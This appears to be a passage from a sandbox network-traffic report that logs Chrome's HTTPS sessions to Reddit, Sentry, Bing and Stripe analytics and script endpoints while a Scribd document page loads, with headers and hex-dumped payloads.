                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        131192.168.2.1649876151.101.129.1404436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:43 UTC654OUTGET /rp.gif?ts=1733522373808&id=t2_9t33vcn2&event=PageVisit&m.itemCount=&m.value=&m.valueDecimal=&m.currency=&m.transactionId=&m.customEventName=&m.products=&m.conversionId=&uuid=90ad4cc1-c7c0-404a-8932-712d98b9d875&aaid=&em=&external_id=&idfa=&integration=reddit&opt_out=0&sh=1280&sw=1024&v=rdt_b192616d&dpm=&dpcc=&dprc= HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: alb.reddit.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:43 UTC828INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 42
                                                                                                                                                                                                                                                                                                                                                                                        Server: Varnish
                                                                                                                                                                                                                                                                                                                                                                                        Retry-After: 0
                                                                                                                                                                                                                                                                                                                                                                                        cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                                        content-type: image/gif
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:43 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        Report-To: {"group": "w3-reporting-nel", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting-nel.reddit.com/reports" }]}, {"group": "w3-reporting", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting.reddit.com/reports" }]}, {"group": "w3-reporting-csp", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting-csp.reddit.com/reports" }]}
                                                                                                                                                                                                                                                                                                                                                                                        NEL: {"report_to": "w3-reporting-nel", "max_age": 14400, "include_subdomains": false, "success_fraction": 0.3, "failure_fraction": 0.3}
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:43 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 01 44 00 3b
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        132192.168.2.164987835.186.247.1564436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:43 UTC727OUTPOST /api/282187/envelope/?sentry_key=21588782029b459685064c03453673ff&sentry_version=7&sentry_client=sentry.javascript.browser%2F7.19.0 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: sentry.io
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 492
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:43 UTC492OUTData Raw: 7b 22 73 65 6e 74 5f 61 74 22 3a 22 32 30 32 34 2d 31 32 2d 30 36 54 32 31 3a 35 39 3a 34 31 2e 30 32 32 5a 22 2c 22 73 64 6b 22 3a 7b 22 6e 61 6d 65 22 3a 22 73 65 6e 74 72 79 2e 6a 61 76 61 73 63 72 69 70 74 2e 62 72 6f 77 73 65 72 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 37 2e 31 39 2e 30 22 7d 7d 0a 7b 22 74 79 70 65 22 3a 22 73 65 73 73 69 6f 6e 22 7d 0a 7b 22 73 69 64 22 3a 22 32 64 64 64 34 30 63 63 39 35 35 63 34 64 39 35 62 65 36 61 62 66 31 36 34 34 36 31 66 33 65 39 22 2c 22 69 6e 69 74 22 3a 74 72 75 65 2c 22 73 74 61 72 74 65 64 22 3a 22 32 30 32 34 2d 31 32 2d 30 36 54 32 31 3a 35 39 3a 34 31 2e 30 32 31 5a 22 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 22 32 30 32 34 2d 31 32 2d 30 36 54 32 31 3a 35 39 3a 34 31 2e 30 32 31 5a 22 2c 22 73 74 61 74
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: {"sent_at":"2024-12-06T21:59:41.022Z","sdk":{"name":"sentry.javascript.browser","version":"7.19.0"}}{"type":"session"}{"sid":"2ddd40cc955c4d95be6abf164461f3e9","init":true,"started":"2024-12-06T21:59:41.021Z","timestamp":"2024-12-06T21:59:41.021Z","stat
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:43 UTC580INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        date: Fri, 06 Dec 2024 21:59:43 GMT
                                                                                                                                                                                                                                                                                                                                                                                        content-type: application/json
                                                                                                                                                                                                                                                                                                                                                                                        vary: Accept-Encoding,origin, access-control-request-method, access-control-request-headers
                                                                                                                                                                                                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                                                                                                                                                                                                        access-control-expose-headers: x-sentry-error,x-sentry-rate-limits,retry-after
                                                                                                                                                                                                                                                                                                                                                                                        cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                                        x-envoy-upstream-service-time: 0
                                                                                                                                                                                                                                                                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                                        via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:43 UTC12INData Raw: 32 0d 0a 7b 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 2{}0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        133192.168.2.1649874151.101.2.2174436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:43 UTC373OUTGET /7.19.0/rewriteframes.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: browser.sentry-cdn.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:43 UTC546INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 2316
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                        Expires: Wed, 29 Oct 2025 06:51:53 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Thu, 10 Nov 2022 15:50:35 GMT
                                                                                                                                                                                                                                                                                                                                                                                        ETag: W/"53c740a2171f2626aa4596a10cf7411e"
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        X-GUploader-Response-Body-Transformations: gunzipped
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Age: 2775792
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:43 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                        Server: Fastly
                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:43 UTC1379INData Raw: 2f 2a 21 20 40 73 65 6e 74 72 79 2f 69 6e 74 65 67 72 61 74 69 6f 6e 73 20 37 2e 31 39 2e 30 20 28 31 38 31 38 34 38 33 29 20 7c 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 67 65 74 73 65 6e 74 72 79 2f 73 65 6e 74 72 79 2d 6a 61 76 61 73 63 72 69 70 74 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 72 3d 7b 7d 3b 63 6f 6e 73 74 20 6e 3d 2f 5e 28 5c 2f 3f 7c 29 28 5b 5c 73 5c 53 5d 2a 3f 29 28 28 3f 3a 5c 2e 7b 31 2c 32 7d 7c 5b 5e 2f 5d 2b 3f 7c 29 28 5c 2e 5b 5e 2e 2f 5d 2a 7c 29 29 28 3f 3a 5b 2f 5d 2a 29 24 2f 3b 66 75 6e 63 74 69 6f 6e 20 65 28 2e 2e 2e 74 29 7b 6c 65 74 20 72 3d 22 22 2c 6e 3d 21 31 3b 66 6f 72 28 6c 65 74 20 65 3d 74 2e 6c 65 6e 67 74 68 2d 31 3b 65 3e 3d 2d 31 26 26 21 6e 3b 65 2d 2d 29 7b 63 6f 6e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: /*! @sentry/integrations 7.19.0 (1818483) | https://github.com/getsentry/sentry-javascript */!function(t){var r={};const n=/^(\/?|)([\s\S]*?)((?:\.{1,2}|[^/]+?|)(\.[^./]*|))(?:[/]*)$/;function e(...t){let r="",n=!1;for(let e=t.length-1;e>=-1&&!n;e--){con
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:43 UTC937INData Raw: 5c 2f 2e 74 65 73 74 28 74 2e 66 69 6c 65 6e 61 6d 65 29 2c 6e 3d 2f 5e 5c 2f 2f 2e 74 65 73 74 28 74 2e 66 69 6c 65 6e 61 6d 65 29 3b 69 66 28 72 7c 7c 6e 29 7b 63 6f 6e 73 74 20 6e 3d 72 3f 74 2e 66 69 6c 65 6e 61 6d 65 2e 72 65 70 6c 61 63 65 28 2f 5e 5b 41 2d 5a 5d 3a 2f 2c 22 22 29 2e 72 65 70 6c 61 63 65 28 2f 5c 5c 2f 67 2c 22 2f 22 29 3a 74 2e 66 69 6c 65 6e 61 6d 65 2c 63 3d 74 68 69 73 2e 69 3f 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 74 3d 65 28 74 29 2e 73 75 62 73 74 72 28 31 29 2c 72 3d 65 28 72 29 2e 73 75 62 73 74 72 28 31 29 3b 63 6f 6e 73 74 20 6e 3d 69 28 74 2e 73 70 6c 69 74 28 22 2f 22 29 29 2c 73 3d 69 28 72 2e 73 70 6c 69 74 28 22 2f 22 29 29 2c 63 3d 4d 61 74 68 2e 6d 69 6e 28 6e 2e 6c 65 6e 67 74 68 2c 73 2e 6c 65 6e 67 74 68 29
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: \/.test(t.filename),n=/^\//.test(t.filename);if(r||n){const n=r?t.filename.replace(/^[A-Z]:/,"").replace(/\\/g,"/"):t.filename,c=this.i?function(t,r){t=e(t).substr(1),r=e(r).substr(1);const n=i(t.split("/")),s=i(r.split("/")),c=Math.min(n.length,s.length)


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        134192.168.2.1649873150.171.27.104436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:43 UTC991OUTGET /action/0?ti=15260218&tm=gtm002&Ver=2&mid=44c4f587-9e43-489b-ac45-0a1621f76cd8&bo=1&sid=61d3cba0b41d11ef9aea290cc24698a9&vid=61d42620b41d11ef884d05fafe2184f7&vids=1&msclkid=N&uach=pv%3D10.0.0&pi=918639831&lg=en-US&sw=1280&sh=1024&sc=24&tl=Advice%20Notification%20%7C%20PDF&p=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F801519291%2FAdvice-Notification%23fullscreen%26from_embed&r=&lt=12196&evt=pageLoad&sv=1&cdb=AQAE&rn=83809 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: bat.bing.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:43 UTC866INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: MUID=3E47CD20EDD963251A77D86DECDE625A; domain=.bing.com; expires=Wed, 31-Dec-2025 21:59:43 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: MR=0; domain=bat.bing.com; expires=Fri, 13-Dec-2024 21:59:43 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                                                                                        X-MSEdge-Ref: Ref A: BC73F5EEA0A74D46953F325084E52F13 Ref B: EWR311000108019 Ref C: 2024-12-06T21:59:43Z
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:43 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        135192.168.2.1649877150.171.28.104436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:43 UTC356OUTGET /p/action/15260218.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: bat.bing.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:43 UTC570INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: private,max-age=1800
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 364
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                                                                                        X-MSEdge-Ref: Ref A: CAF7527CF9C14C7BB2415BFD381B3F81 Ref B: EWR30EDGE0709 Ref C: 2024-12-06T21:59:43Z
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:43 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:43 UTC364INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 63 2c 6b 2c 61 2c 62 2c 74 2c 65 29 20 7b 0a 20 20 20 20 76 61 72 20 63 73 20 3d 20 64 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 3b 0a 20 20 20 20 69 66 20 28 63 73 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 75 6f 20 3d 20 63 73 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 75 65 74 6f 27 29 3b 0a 20 20 20 20 20 20 20 20 69 66 20 28 75 6f 20 26 26 20 77 5b 75 6f 5d 20 26 26 20 74 79 70 65 6f 66 20 77 5b 75 6f 5d 2e 73 65 74 55 73 65 72 53 69 67 6e 61 6c 73 20 3d 3d 3d 20 27 66 75 6e 63 74 69 6f 6e 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 5b 75 6f 5d 2e 73 65 74 55 73 65 72 53 69 67 6e 61 6c 73 28 7b 27 65 61 27 3a 20 63 2c 20 27 6b 63 27 3a 20 6b 2c 20 27 61 74 27 3a 20 61 2c 20 27
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: (function(w,d,c,k,a,b,t,e) { var cs = d.currentScript; if (cs) { var uo = cs.getAttribute('data-ueto'); if (uo && w[uo] && typeof w[uo].setUserSignals === 'function') { w[uo].setUserSignals({'ea': c, 'kc': k, 'at': a, '


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        136192.168.2.164987952.222.144.584436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:43 UTC353OUTGET /out-4.5.44.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: m.stripe.network
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:44 UTC651INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 88793
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Thu, 05 Dec 2024 23:02:56 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Server: Cloudfront
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:41 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=300, public
                                                                                                                                                                                                                                                                                                                                                                                        Etag: "fd35981a337052cd3ccd82dc674ff76d"
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 1976c726f5a49e79daf18d11f7fa62da.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                                        Age: 2
                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31556926; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                                                                                                                        X-Amz-Cf-Pop: MRS52-C2
                                                                                                                                                                                                                                                                                                                                                                                        X-Amz-Cf-Id: HlcMvBBI29EWQWbQjpI1SduL78ZqBL-07BmxMzxWxUXnhiu6Wy7cvw==
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:44 UTC15733INData Raw: 76 61 72 20 53 74 72 69 70 65 4d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 72 29 7b 69 66 28 74 5b 72 5d 29 72 65 74 75 72 6e 20 74 5b 72 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 5f 3d 74 5b 72 5d 3d 7b 69 3a 72 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 72 5d 2e 63 61 6c 6c 28 5f 2e 65 78 70 6f 72 74 73 2c 5f 2c 5f 2e 65 78 70 6f 72 74 73 2c 6e 29 2c 5f 2e 6c 3d 21 30 2c 5f 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6e 2e 6d 3d 65 2c 6e 2e 63 3d 74 2c 6e 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 6e 2e 6f 28 65 2c 74 29 7c 7c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: var StripeM=function(e){var t={};function n(r){if(t[r])return t[r].exports;var _=t[r]={i:r,l:!1,exports:{}};return e[r].call(_.exports,_,_.exports,n),_.l=!0,_.exports}return n.m=e,n.c=t,n.d=function(e,t,r){n.o(e,t)||Object.defineProperty(e,t,{enumerable:!
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:44 UTC16384INData Raw: 5f 5f 22 2c 41 29 2c 65 28 22 5f 5f 73 65 74 5f 5f 22 2c 41 29 2c 65 28 22 5f 5f 72 65 73 65 74 5f 5f 22 2c 47 29 2c 65 28 22 5f 5f 52 65 73 65 74 44 65 70 65 6e 64 65 6e 63 79 5f 5f 22 2c 47 29 2c 65 28 22 5f 5f 77 69 74 68 5f 5f 22 2c 44 29 7d 28 29 7d 29 2e 63 61 6c 6c 28 74 68 69 73 2c 6e 28 33 29 29 7d 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 2d 31 2c 72 3d 6e 75 6c 6c 3d 3d 65 3f 30 3a 65 2e 6c 65 6e 67 74 68 2c 5f 3d 41 72 72 61 79 28 72 29 3b 2b 2b 6e 3c 72 3b 29 5f 5b 6e 5d 3d 74 28 65 5b 6e 5d 2c 6e 2c 65 29 3b 72 65 74 75 72 6e 20 5f 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: __",A),e("__set__",A),e("__reset__",G),e("__ResetDependency__",G),e("__with__",D)}()}).call(this,n(3))},function(e,t){e.exports=function(e,t){for(var n=-1,r=null==e?0:e.length,_=Array(r);++n<r;)_[n]=t(e[n],n,e);return _}},function(e,t,n){"use strict";(fun
